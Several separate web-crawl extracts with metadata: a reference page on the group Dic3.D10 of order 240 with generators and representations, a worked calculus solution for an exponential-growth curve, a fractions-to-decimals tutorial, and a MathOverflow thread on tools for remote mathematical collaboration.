C22×S3, C22×D5, C4○D12, S3×D5, D42D5, C2×S3×D5, Dic3.D10 Smallest permutation representation of Dic3.D10 On 120 points Generators in S120 (1 103 93 50 75 22)(2 23 76 41 94 104)(3 105 95 42 77 24)(4 25 78 43 96 106)(5 107 97 44 79 26)(6 27 80 45 98 108)(7 109 99 46 71 28)(8 29 72 47 100 110)(9 101 91 48 73 30)(10 21 74 49 92 102)(11 31 112 59 65 84)(12 85 66 60 113 32)(13 33 114 51 67 86)(14 87 68 52 115 34)(15 35 116 53 69 88)(16 89 70 54 117 36)(17 37 118 55 61 90)(18 81 62 56 119 38)(19 39 120 57 63 82)(20 83 64 58 111 40) (1 118 50 90)(2 81 41 119)(3 120 42 82)(4 83 43 111)(5 112 44 84)(6 85 45 113)(7 114 46 86)(8 87 47 115)(9 116 48 88)(10 89 49 117)(11 26 59 97)(12 98 60 27)(13 28 51 99)(14 100 52 29)(15 30 53 91)(16 92 54 21)(17 22 55 93)(18 94 56 23)(19 24 57 95)(20 96 58 25)(31 79 65 107)(32 108 66 80)(33 71 67 109)(34 110 68 72)(35 73 69 101)(36 102 70 74)(37 75 61 103)(38 104 62 76)(39 77 63 105)(40 106 64 78) (1 2 3 4 5 6 7 8 9 10)(11 12 13 14 15 16 17 18 19 20)(21 22 23 24 25 26 27 28 29 30)(31 32 33 34 35 36 37 38 39 40)(41 42 43 44 45 46 47 48 49 50)(51 52 53 54 55 56 57 58 59 60)(61 62 63 64 65 66 67 68 69 70)(71 72 73 74 75 76 77 78 79 80)(81 82 83 84 85 86 87 88 89 90)(91 92 93 94 95 96 97 98 99 100)(101 102 103 104 105 106 107 108 109 110)(111 112 113 114 115 116 117 118 119 120) (1 89 50 117)(2 88 41 116)(3 87 42 115)(4 86 43 114)(5 85 44 113)(6 84 45 112)(7 83 46 111)(8 82 47 120)(9 81 48 119)(10 90 49 118)(11 80 59 108)(12 79 60 107)(13 78 51 106)(14 77 52 105)(15 76 53 104)(16 75 54 103)(17 74 55 102)(18 73 56 101)(19 72 57 110)(20 71 58 109)(21 61 92 37)(22 70 93 36)(23 69 94 35)(24 68 95 34)(25 67 96 33)(26 66 97 32)(27 65 98 31)(28 64 99 40)(29 63 100 39)(30 62 91 38) G:=sub<Sym(120)| (1,103,93,50,75,22)(2,23,76,41,94,104)(3,105,95,42,77,24)(4,25,78,43,96,106)(5,107,97,44,79,26)(6,27,80,45,98,108)(7,109,99,46,71,28)(8,29,72,47,100,110)(9,101,91,48,73,30)(10,21,74,49,92,102)(11,31,112,59,65,84)(12,85,66,60,113,32)(13,33,114,51,67,86)(14,87,68,52,115,34)(15,35,116,53,69,88)(16,89,70,54,117,36)(17,37,118,55,61,90)(18,81,62,56,119,38)(19,39,120,57,63,82)(20,83,64,58,111,40), 
(1,118,50,90)(2,81,41,119)(3,120,42,82)(4,83,43,111)(5,112,44,84)(6,85,45,113)(7,114,46,86)(8,87,47,115)(9,116,48,88)(10,89,49,117)(11,26,59,97)(12,98,60,27)(13,28,51,99)(14,100,52,29)(15,30,53,91)(16,92,54,21)(17,22,55,93)(18,94,56,23)(19,24,57,95)(20,96,58,25)(31,79,65,107)(32,108,66,80)(33,71,67,109)(34,110,68,72)(35,73,69,101)(36,102,70,74)(37,75,61,103)(38,104,62,76)(39,77,63,105)(40,106,64,78), (1,2,3,4,5,6,7,8,9,10)(11,12,13,14,15,16,17,18,19,20)(21,22,23,24,25,26,27,28,29,30)(31,32,33,34,35,36,37,38,39,40)(41,42,43,44,45,46,47,48,49,50)(51,52,53,54,55,56,57,58,59,60)(61,62,63,64,65,66,67,68,69,70)(71,72,73,74,75,76,77,78,79,80)(81,82,83,84,85,86,87,88,89,90)(91,92,93,94,95,96,97,98,99,100)(101,102,103,104,105,106,107,108,109,110)(111,112,113,114,115,116,117,118,119,120), (1,89,50,117)(2,88,41,116)(3,87,42,115)(4,86,43,114)(5,85,44,113)(6,84,45,112)(7,83,46,111)(8,82,47,120)(9,81,48,119)(10,90,49,118)(11,80,59,108)(12,79,60,107)(13,78,51,106)(14,77,52,105)(15,76,53,104)(16,75,54,103)(17,74,55,102)(18,73,56,101)(19,72,57,110)(20,71,58,109)(21,61,92,37)(22,70,93,36)(23,69,94,35)(24,68,95,34)(25,67,96,33)(26,66,97,32)(27,65,98,31)(28,64,99,40)(29,63,100,39)(30,62,91,38)>; G:=Group( (1,103,93,50,75,22)(2,23,76,41,94,104)(3,105,95,42,77,24)(4,25,78,43,96,106)(5,107,97,44,79,26)(6,27,80,45,98,108)(7,109,99,46,71,28)(8,29,72,47,100,110)(9,101,91,48,73,30)(10,21,74,49,92,102)(11,31,112,59,65,84)(12,85,66,60,113,32)(13,33,114,51,67,86)(14,87,68,52,115,34)(15,35,116,53,69,88)(16,89,70,54,117,36)(17,37,118,55,61,90)(18,81,62,56,119,38)(19,39,120,57,63,82)(20,83,64,58,111,40), (1,118,50,90)(2,81,41,119)(3,120,42,82)(4,83,43,111)(5,112,44,84)(6,85,45,113)(7,114,46,86)(8,87,47,115)(9,116,48,88)(10,89,49,117)(11,26,59,97)(12,98,60,27)(13,28,51,99)(14,100,52,29)(15,30,53,91)(16,92,54,21)(17,22,55,93)(18,94,56,23)(19,24,57,95)(20,96,58,25)(31,79,65,107)(32,108,66,80)(33,71,67,109)(34,110,68,72)(35,73,69,101)(36,102,70,74)(37,75,61,103)(38,104,62,76)(39,77,63,105)(40,106,64,78), (1,2,3,4,5,6,7,8,9,10)(11,12,13,14,15,16,17,18,19,20)(21,22,23,24,25,26,27,28,29,30)(31,32,33,34,35,36,37,38,39,40)(41,42,43,44,45,46,47,48,49,50)(51,52,53,54,55,56,57,58,59,60)(61,62,63,64,65,66,67,68,69,70)(71,72,73,74,75,76,77,78,79,80)(81,82,83,84,85,86,87,88,89,90)(91,92,93,94,95,96,97,98,99,100)(101,102,103,104,105,106,107,108,109,110)(111,112,113,114,115,116,117,118,119,120), (1,89,50,117)(2,88,41,116)(3,87,42,115)(4,86,43,114)(5,85,44,113)(6,84,45,112)(7,83,46,111)(8,82,47,120)(9,81,48,119)(10,90,49,118)(11,80,59,108)(12,79,60,107)(13,78,51,106)(14,77,52,105)(15,76,53,104)(16,75,54,103)(17,74,55,102)(18,73,56,101)(19,72,57,110)(20,71,58,109)(21,61,92,37)(22,70,93,36)(23,69,94,35)(24,68,95,34)(25,67,96,33)(26,66,97,32)(27,65,98,31)(28,64,99,40)(29,63,100,39)(30,62,91,38) ); G=PermutationGroup([(1,103,93,50,75,22),(2,23,76,41,94,104),(3,105,95,42,77,24),(4,25,78,43,96,106),(5,107,97,44,79,26),(6,27,80,45,98,108),(7,109,99,46,71,28),(8,29,72,47,100,110),(9,101,91,48,73,30),(10,21,74,49,92,102),(11,31,112,59,65,84),(12,85,66,60,113,32),(13,33,114,51,67,86),(14,87,68,52,115,34),(15,35,116,53,69,88),(16,89,70,54,117,36),(17,37,118,55,61,90),(18,81,62,56,119,38),(19,39,120,57,63,82),(20,83,64,58,111,40)], 
[(1,118,50,90),(2,81,41,119),(3,120,42,82),(4,83,43,111),(5,112,44,84),(6,85,45,113),(7,114,46,86),(8,87,47,115),(9,116,48,88),(10,89,49,117),(11,26,59,97),(12,98,60,27),(13,28,51,99),(14,100,52,29),(15,30,53,91),(16,92,54,21),(17,22,55,93),(18,94,56,23),(19,24,57,95),(20,96,58,25),(31,79,65,107),(32,108,66,80),(33,71,67,109),(34,110,68,72),(35,73,69,101),(36,102,70,74),(37,75,61,103),(38,104,62,76),(39,77,63,105),(40,106,64,78)], [(1,2,3,4,5,6,7,8,9,10),(11,12,13,14,15,16,17,18,19,20),(21,22,23,24,25,26,27,28,29,30),(31,32,33,34,35,36,37,38,39,40),(41,42,43,44,45,46,47,48,49,50),(51,52,53,54,55,56,57,58,59,60),(61,62,63,64,65,66,67,68,69,70),(71,72,73,74,75,76,77,78,79,80),(81,82,83,84,85,86,87,88,89,90),(91,92,93,94,95,96,97,98,99,100),(101,102,103,104,105,106,107,108,109,110),(111,112,113,114,115,116,117,118,119,120)], [(1,89,50,117),(2,88,41,116),(3,87,42,115),(4,86,43,114),(5,85,44,113),(6,84,45,112),(7,83,46,111),(8,82,47,120),(9,81,48,119),(10,90,49,118),(11,80,59,108),(12,79,60,107),(13,78,51,106),(14,77,52,105),(15,76,53,104),(16,75,54,103),(17,74,55,102),(18,73,56,101),(19,72,57,110),(20,71,58,109),(21,61,92,37),(22,70,93,36),(23,69,94,35),(24,68,95,34),(25,67,96,33),(26,66,97,32),(27,65,98,31),(28,64,99,40),(29,63,100,39),(30,62,91,38)]) 36 conjugacy classes class 1 2A 2B 2C 2D 3 4A 4B 4C 4D 4E 5A 5B 6A 6B 6C 10A 10B 10C 10D 10E 10F 12A 12B 12C 12D 15A 15B 20A 20B 30A ··· 30F order 1 2 2 2 2 3 4 4 4 4 4 5 5 6 6 6 10 10 10 10 10 10 12 12 12 12 15 15 20 20 30 ··· 30 size 1 1 2 6 30 2 5 5 6 10 30 2 2 2 2 2 2 2 4 4 12 12 10 10 10 10 4 4 12 12 4 ··· 4 36 irreducible representations dim 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 4 4 4 4 type + + + + + + + + + + + + + + + + - + image C1 C2 C2 C2 C2 C2 C2 C2 S3 D5 D6 D6 C4○D4 D10 D10 D10 C4○D12 S3×D5 D4⋊2D5 C2×S3×D5 Dic3.D10 kernel Dic3.D10 S3×Dic5 D30.C2 C5⋊D12 C15⋊Q8 C6×Dic5 C5×C3⋊D4 C15⋊7D4 C2×Dic5 C3⋊D4 Dic5 C2×C10 C15 Dic3 D6 C2×C6 C5 C22 C3 C2 C1 # reps 1 1 1 1 1 1 1 1 1 2 2 1 2 2 2 2 4 2 2 2 4 Matrix representation of Dic3.D10 in GL6(𝔽61) 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1 0 0 0 0 60 60 0 0 0 0 0 0 60 0 0 0 0 0 0 60 , 1 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 60 60 0 0 0 0 0 0 11 0 0 0 0 0 33 50 , 1 43 0 0 0 0 18 43 0 0 0 0 0 0 60 0 0 0 0 0 1 1 0 0 0 0 0 0 50 48 0 0 0 0 28 11 , 1 0 0 0 0 0 18 60 0 0 0 0 0 0 60 0 0 0 0 0 1 1 0 0 0 0 0 0 60 21 0 0 0 0 58 1 G:=sub<GL(6,GF(61))| [1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,60,0,0,0,0,1,60,0,0,0,0,0,0,60,0,0,0,0,0,0,60],[1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,60,0,0,0,0,0,60,0,0,0,0,0,0,11,33,0,0,0,0,0,50],[1,18,0,0,0,0,43,43,0,0,0,0,0,0,60,1,0,0,0,0,0,1,0,0,0,0,0,0,50,28,0,0,0,0,48,11],[1,18,0,0,0,0,0,60,0,0,0,0,0,0,60,1,0,0,0,0,0,1,0,0,0,0,0,0,60,58,0,0,0,0,21,1] >; Dic3.D10 in GAP, Magma, Sage, TeX {\rm Dic}_3.D_{10} % in TeX G:=Group("Dic3.D10"); // GroupNames label G:=SmallGroup(240,143); // by ID G=gap.SmallGroup(240,143); # by ID G:=PCGroup([6,-2,-2,-2,-2,-3,-5,48,116,490,6917]); // Polycyclic G:=Group<a,b,c,d|a^6=c^10=1,b^2=d^2=a^3,b*a*b^-1=c*a*c^-1=d*a*d^-1=a^-1,c*b*c^-1=d*b*d^-1=a^3*b,d*c*d^-1=c^-1>; // generators/relations ׿ × 𝔽
2020-06-01 20:20:05
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9566978216171265, "perplexity": 1395.3458954771197}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347419593.76/warc/CC-MAIN-20200601180335-20200601210335-00149.warc.gz"}
https://www.gradesaver.com/textbooks/math/calculus/calculus-early-transcendentals-8th-edition/chapter-3-section-3-8-exponential-growth-and-decay-3-8-exercises-page-244/14
## Calculus: Early Transcendentals 8th Edition

The equation of the curve is: $y = 5~e^{2x}$

The slope of the curve is twice the y-coordinate: $\frac{dy}{dx} = 2y$

This is the differential equation for exponential growth, so its general solution is: $y = y(0)e^{2x}$

The curve passes through the point $(0,5)$, which determines $y(0)$:

$y(0)e^{(2)(0)} = 5$

$y(0) = 5$

Therefore, the equation of the curve is: $y = 5~e^{2x}$
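As a quick check (my own addition, not part of the GradeSaver solution), sympy's ODE solver reproduces the same curve from the initial-value problem:

```python
import sympy as sp

x = sp.symbols('x')
y = sp.Function('y')

# Solve dy/dx = 2y with the initial condition y(0) = 5
sol = sp.dsolve(sp.Eq(y(x).diff(x), 2 * y(x)), y(x), ics={y(0): 5})
print(sol)  # Eq(y(x), 5*exp(2*x))
```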
2019-11-19 07:23:02
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9807353615760803, "perplexity": 137.61064757287244}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496670036.23/warc/CC-MAIN-20191119070311-20191119094311-00223.warc.gz"}
https://www.ipracticemath.com/learn/decimal/converting_fractions_to_decimals
# Converting Fractions to Decimals

There are instances where fractions need to be converted to decimals. A good example is when you deal with money. It is not appropriate to write $50 1/2 in bank cheques and ledgers. The right way is to write it as the decimal $50.50.

A fraction is a ratio between two integers. Division is the most common and easiest method to convert fractions to decimal form.

### Steps for converting Fractions to Decimals

- Use the denominator as the divisor and the numerator as the dividend.
- In writing decimals, if there are no non-zero integers to the left of the decimal point, put a zero (0) before the decimal point.
- If the decimal has continuously repeating digits, put an ellipsis (...) after the number or a vinculum (overline) on top of the repeating digit/s.

## Convert 31/100 to decimal

#### Explanation:

Using division: 100 goes into 310 three times (3 × 100 = 300), leaving a remainder of 10. Bring down the next 0 to make 100; 100 goes into 100 once (1 × 100 = 100), leaving 0.

Therefore, 31/100 is 0.31 in decimal.

## Convert 7/4 to decimal

#### Explanation:

Using division: 4 goes into 7 once (1 × 4 = 4), remainder 3. Bring down a 0 to make 30; 4 goes in seven times (7 × 4 = 28), remainder 2. Bring down another 0 to make 20; 4 goes in five times (5 × 4 = 20), remainder 0.

Therefore, 7/4 in decimal is 1.75.

## Find the decimal form of 5/6

#### Explanation:

Using division: 6 goes into 50 eight times (8 × 6 = 48), remainder 2. Bring down a 0 to make 20; 6 goes in three times (3 × 6 = 18), remainder 2. From here the remainder 2 recurs, so the digit 3 repeats forever.

Since the digit 3 is continuous as we go along with the division, put either an ellipsis after it or a vinculum (overline) on top of the repeating digit, which is 3.

Therefore, the decimal form of 5/6 is 0.8333...
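The long-division procedure above is mechanical enough to automate. Here is a small Python sketch (my own illustration, not from the original page; the function name is made up) that performs the division digit by digit and detects a repeating block by tracking remainders:

```python
def fraction_to_decimal(numerator, denominator, max_digits=30):
    """Long division: returns the decimal string, with the repeating
    block (if any) wrapped in parentheses, e.g. 5/6 -> '0.8(3)'."""
    integer_part, remainder = divmod(numerator, denominator)
    digits, seen = [], {}  # seen maps each remainder to the digit index where it appeared
    while remainder and remainder not in seen and len(digits) < max_digits:
        seen[remainder] = len(digits)
        remainder *= 10
        digit, remainder = divmod(remainder, denominator)
        digits.append(str(digit))
    if remainder in seen:  # the same remainder recurred: digits repeat from there
        i = seen[remainder]
        return f"{integer_part}." + "".join(digits[:i]) + "(" + "".join(digits[i:]) + ")"
    return f"{integer_part}." + ("".join(digits) or "0")

print(fraction_to_decimal(31, 100))  # 0.31
print(fraction_to_decimal(7, 4))     # 1.75
print(fraction_to_decimal(5, 6))     # 0.8(3)
```

Tracking remainders works because the digits must repeat as soon as a remainder recurs, and there are only as many possible remainders as the denominator, so the repeating block is found in at most that many steps.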
2021-10-26 09:48:47
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7022947072982788, "perplexity": 1718.3661429952692}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587854.13/warc/CC-MAIN-20211026072759-20211026102759-00392.warc.gz"}
http://mathoverflow.net/feeds/question/49384
# Tools for long-distance collaboration - MathOverflow

Asked by Willie Wong, 2010-12-14 (http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration).

## Background

In general, I am aware of four and a half methods of long-distance collaboration:

1. Telephone (including voice-chat, VOIP, etc.; anything that is voice based)
2. Text chat (chat room, IM, gchat, things like that)
3. E-mail (or other asynchronous messaging system)
4. Online whiteboards, real-time collaborative text editors, desktop-sharing (or other software, graphical system)
5. (The half) Adding a webcam to any of the above and calling it Video-blah.

**What this question is not about**

I am not asking about [tools for collaborative paper-writing](http://mathoverflow.net/questions/3044/tools-for-collaborative-paper-writing), which has already been addressed here last year. So in particular, to limit the scope, this question is not about the part of a collaboration when all the ideas are set out, all the heuristics checked, and all that's left is to flesh out the argument and write it up.

I am also *not* asking for just a list of services. I am fairly confident my Google-fu is at least as good as yours.

**What this question is about**

I am interested in tools that help collaboration in the earlier stage, when we are still brainstorming and setting the scope of the project, or the stage where we are troubleshooting to fix a flawed argument. In other words, I am interested in the scenarios where the ideal thing to do would be a face-to-face chat while writing on a blackboard or a piece of paper, but when it is difficult to do so (both of you have to teach, and you are on different continents).

In other words, I am asking about situations where real-time, instantaneous interactions are preferred (and so option 3, e-mail, should be reserved as a last resort). In this sense, voice interaction is preferred: it is a lot easier to interrupt the other party when talking than when typing, and so force a change of direction in the conversation. On the other hand, e-mail and a lot of chat software have the advantage that your discussions are automatically documented and saved for future review. The main downside to pure voice communication, however, is that (for me at least) mathematics is visual. It helps a lot when there is a blackboard or a piece of paper with equations on it on which I can focus my attention. So I'm especially interested in ways that I can share mathematics visually (rendered LaTeX, diagrams, things like that).

## The Question

There are two questions:

- Personal testimonials: of the above solutions, which, and in what combinations, have you used and feel strongly about? I would especially appreciate it if you can say a few words about the strengths and potential weaknesses of the setup.
- Thinking outside the box: are there other solutions that I have overlooked in my list above?

## Answers

**h10** (2010-12-14): Google Wave. It's the next big thing.

**Michael** (2010-12-14): Using an online whiteboard with [pen tablets](http://en.wikipedia.org/wiki/Graphics_tablet) while talking over Skype is the closest I've come to sitting around a piece of paper. I've done this with two other people simultaneously and it worked quite well.

Unfortunately everyone needs additional hardware for this setup to be fun, but the cheapest pen tablets (from Wacom, e.g.) are at about $70 and are quite easy to use and get used to. The most annoying part, as I recall, were the online whiteboards, which could crash or behave strangely, not have enough writing area, or not allow saving the content. ~~For a short while a good alternative was Google docs drawings, but it looks like they've removed the freehand drawing tool. So I'm still looking for something adequate there.~~ **Correction:** [Google docs](https://docs.google.com/) drawings may be used as an online whiteboard and allows one to save the content. The scribble tool can be found under the shape button.

**Edit** (in response to Willie's comment): Stingy as I am, I've only used free online whiteboards, so I really can't complain. The best of these I've found were [twiddla](http://www.twiddla.com/), [scriblink](http://www.scriblink.com/) and [skrbl](http://www.skrbl.com/). Some of them have paid plans which probably improve the user experience.

Concerning the pen tablet, I have an older version of the [Wacom Bamboo Pen](http://www.wacom.com/bamboo/bamboo_pen.php) with which I'm happy. The fancier ones use a screen as a writing surface. I imagine that makes it feel more like writing on paper, but I'm waiting for those to merge with computer tablets.

**sleepless in beantown** (2010-12-14): What needs to exist is a system akin to this site's functionality that could be used on a personal or university server and allow multiple people to contribute (via password-protected entry to the web-site) together to a notebook page which contains $\LaTeX$ markup and does it in a clean fashion.

Perhaps the newer incarnation or instantiation of MO being tested on alpha.mathoverflow.net would allow for something like "private question pages" which are invitation only and could be used as an adjunct for whiteboard-like functionality while the participants also use a telephone or Skype or any other tools for instant collaboration. This technique would also allow for asynchronous updating by the collaborators if they happen to be living/working in different time zones.

**Beth** (2010-12-14): I have been using Skype with the webcam pointed at my office whiteboard. I have found that the video quality is good enough to read what is on the other person's whiteboard. This isn't as nice as all parties being able to write on the same surface, but it's a great improvement over just talking and is very easy to do.

**Peter Krautzberger** (2010-12-14): I'm a little late to the party, and a lot of my favorite tools have been mentioned, but since Willie Wong asked for testimonials...

- **Meta**: don't expect it to be 'just as easy'! If you suggest using some of these tools, make sure your collaborator understands that this requires effort (at least initially) and a different routine.
- **Audio/video**: video calls are cheap and easy to use -- perfect for all those hand-waving arguments. I mostly use *skype* (I tried tokbox for multi-user conferencing but never used it frequently). Also, as mentioned by Beth, skype is good enough to broadcast a (small) blackboard. If you have a *real camcorder*, you can broadcast using *vlc, justin.tv or ustream* for higher resolution video (this comes with lag, so keep some other audio solution). Also great for hooking people up to seminars, btw.
- **Online whiteboards with tablets!** The combination of online whiteboards and tablets is my favorite since it can be set up almost anywhere. I personally use *scriblink and dabbleboard* extensively; scriblink is more reliable and uses less bandwidth, but dabbleboard has fancier technology (shape recognition, upload documents as background). For more privacy, there's also *jarnal*, which can connect across the net, but I could never get it to work through firewalls. There are also all-in-one tools like *dimdim* -- but they were always too general for my purpose (and had problems with flash under linux). As already mentioned by Michael, whiteboards only make sense with a *tablet of some sort* (I was happy with a Wacom Bamboo (cheap), but a tablet PC is even better (I have an HP TM2 running Ubuntu)). Of course, you can type text on online whiteboards (scriblink even does a little TeX), but there are better tools for plain text.
- **Remote desktops**: Sometimes I also like to connect the desktops, i.e., allowing one side to fully access the other side's desktop. I usually do this via *teamviewer* (connects through firewalls), but *vnc, rdp* are good, too. The advantage: all your programs are there! Anything you can do on your computer, you can do together. E.g., *Xournal, OneNote* for tablet-scribbling, *gummi or latexian* for live-previewed LaTeX, pdf-viewers for collaborative document browsing, etc.
- **LaTeX (in the cloud)**: If you just want to scribble some TeX, there are many wikis with $\LaTeX$ support. I use *Tiddlywiki* with the mathsvg-plugin a lot these days -- a single html/javascript file, portable, fast TeX. Combine it with a cloud service like *dropbox or box.net* and you can keep everything up-to-date in real time.

**domenico fiorenza** (2010-12-14): Also, specific forum discussions and wikis may be useful: my last arXiv preprint has been essentially developed on http://www.math.ntnu.no/~stacey/Mathforge/nForum/ before being put in paper form. It may be of interest to this topic that the three authors of http://arxiv.org/abs/1011.4735 have never met face-to-face and the whole development of the paper has been via web tools. (Sorry for making an example in which I'm personally involved.)

**Andrew Stacey** (2010-12-14): First, the disclaimer: although I do have long-distance collaborations, I've not yet done much real-time serious mathematics. The reasons for this are many and varied, but one relevant one is simply that my speed-of-thought is actually much slower than (I suspect) many people's, so even in short-distance collaborations the "together time" is spent in *reporting* rather than *brain-storming*, and that's a bit different.

That said, "doing maths online" is a bit of a pet project of mine at the moment, so here are some thoughts.

1. Use a wiki. [Instiki](http://www.instiki.org), of course, as it's the only one with decent maths support. This isn't for the *actual* dialogue, but given that the time is going to be precious, it will be useful to "set the agenda" beforehand and "take minutes" afterwards.
2. For the actual collaboration, I'd recommend [jarnal](http://levine.sscnet.ucla.edu/general/software/tc1000/jarnal.htm). It has a client-server part so you can set up a "virtual whiteboard" for collaborating. Of course, you'd need to add the voice bit on top (telephone, perchance?). With a graphics tablet, I'd think that this would work just fine. I've used jarnal for writing in lectures and have found it very easy to use. Writing on a tablet instead of the screen quickly becomes second nature as well. (For the record, I use a Wacom Bamboo Fun tablet which I picked up in the UK for around 30 quid and I find it works just fine.) Jarnal is also cross-platform (written in Java) so there's no worry about different operating systems not supporting it. Note that using something like jarnal has the distinct advantage over webcam+whiteboard that the session is saved automatically.
3. If the emphasis is less on *real time*, I would recommend a mathematics-enabled forum (I happen to know one I could let you have at a very reasonable price, no obvious damage, no income tax, no VAT, ...). It is almost real-time; when necessary one can take the time to compose a longer answer, and the back-and-forth is recorded as well. Again, this probably reflects the fact that my "speed of thought" is slower than most, so I like to be able to read what the other person has written and ponder it a little before replying.

I suspect that a good collaboration would use something akin to all three of those: the real-time for the brainstorming, the forum for the more thoughtful discussions, and the wiki for recording the bits that stand the test of time.

**Larry Stout** (2010-12-14): Maratech does exactly what you need. It has a video chat coupled with a shared whiteboard on which you can share pieces of text, drawings, pdf files, LaTeX code, etc. I've been using it for about three years for a collaboration with two Finnish mathematicians. The drawback, a big one: the company that made it was bought about two years ago and there hasn't been any word of it since.

**Greg Graviton** (2010-12-15): *Tools I've actually used.* While not serious mathematics, I have written computer programs collaboratively in real-time with

- [Skype](http://www.skype.com/) (voice) and a cheap USB headset to have my hands free
- [Etherpad](http://etherpad.org/public-sites/) (real-time simultaneous document editor)
- a custom shell script to feed the Etherpad document right into the compiler

This works perfectly for this particular purpose. In particular, it's much better than two persons trying to program in front of a single computer.

I've also bought a pen tablet (a small [Wacom Bamboo Fun](http://www.wacom.com/bamboo/bamboo_fun.php) for about 90€) that I am using for mathematical illustrations. Being able to sketch pictures is astonishingly liberating when communicating mathematics on the computer!

*Tools I'm planning to use.* Of course, I'm now trying to use the tablet for real-time collaboration on mathematics. I haven't found a good modus operandi yet, though, apart from some experiments with the [CoSketch online whiteboard](http://www.cosketch.com/). Usually, the main problem is that the colleague doesn't have a pen tablet himself…

I'm also looking into the possibility of setting up an [electronic whiteboard with a Wii remote](http://www.youtube.com/watch?v=5s5EvhHy7eQ). But that would just be a substitute for a pen tablet.

Ah, and for sharing a set of documents with your colleague, there is [Dropbox](http://www.dropbox.com/), which allows you to synchronize folders on different computers. No more chaos with different versions in different e-mails!

**Kostya** (2010-12-15): I once had the experience of writing "collaborative" text in LaTeX by using [subversion](http://en.wikipedia.org/wiki/Apache_Subversion) -- a software versioning and revision control system for program developers. That was really cool! Every time you have the most up-to-date version, and all the "collisions" are dealt with automatically, etc. The problem is: all your collaborators have to be familiar with this software and the concepts. That's why I had such an experience only once. But I still use it for my own projects -- I set up a repository on my USB dongle, so I do not depend on the computer I use...

**jbenet** (2012-01-26): Sorry to revive a post so old, but I figured I'd add a small collaboration tool I just built. OP mentioned chat services and $\LaTeX$. Check out http://texchat.juanbb.com/, a super-simple webchat that renders $\LaTeX$ math (using MathJax). I built it to address guiding others through equations online (e.g. a tutor or study-group setting), but it's as general as a chat can be. Cheers!

**B. Bischof** (2012-01-26): Since this has been stirred back up after so long, I will chime in: http://asana.com/ is a great tool for organizing to-do lists, with lots of tools for making the lists more than just lists.

**Stefan Waldmann** (2012-01-26): It seems that there are still some tools missing in this long list. What I really enjoy more and more is a version control system. Personally, I prefer git over other, more centralized solutions like subversion. It has several nice advantages when you're using different computers (say a desktop in your office and a laptop on the train or so) for which you do not always have a reliable internet connection. With the de-centralized approach of git, this is no big problem: you can commit changes locally and merge things back globally at a later time. I have by now had some nice experience with collaborators all over the globe using this...

**Michael Murray** (2013-02-08): Has anyone tried one of these Logitech conference cameras with Skype (http://www.logitech.com/en-us/product/Conferencecam?crid=1252) as a collaborative tool? I saw one report on-line of someone trying to use it to look at a whiteboard and claiming it didn't work because of reflections off the shiny surface. Thanks - Michael
2013-05-25 23:06:53
